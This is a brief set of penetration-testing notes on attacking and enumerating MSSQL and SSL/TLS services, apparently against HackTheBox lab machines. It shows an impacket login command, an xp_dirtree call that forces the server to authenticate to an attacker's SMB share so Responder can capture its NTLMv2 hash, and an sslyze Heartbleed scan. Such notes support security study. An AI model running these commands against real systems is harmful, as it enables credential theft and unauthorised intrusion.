Misc Service Attack Misc Services

February 23, 2021 at 12:46 AM Edit on GitHub

Misc Services Enumeration & Attack

Table of Contents

tags: Security Recon MSSQL SSL

MSSQL

Use impacket python script as client

python3 mssqlclient.py reporting@10.10.10.125 -windows-auth

Get NTLMv2-SSP Hash

SQL> xp_dirtree "\\10.10.14.42\WildfootW\"

Then we can get Hash in Responder

SSL/TLS

SSLyze

GitHub SSL/TLS server scanning

sslyze --heartbleed valentine.htb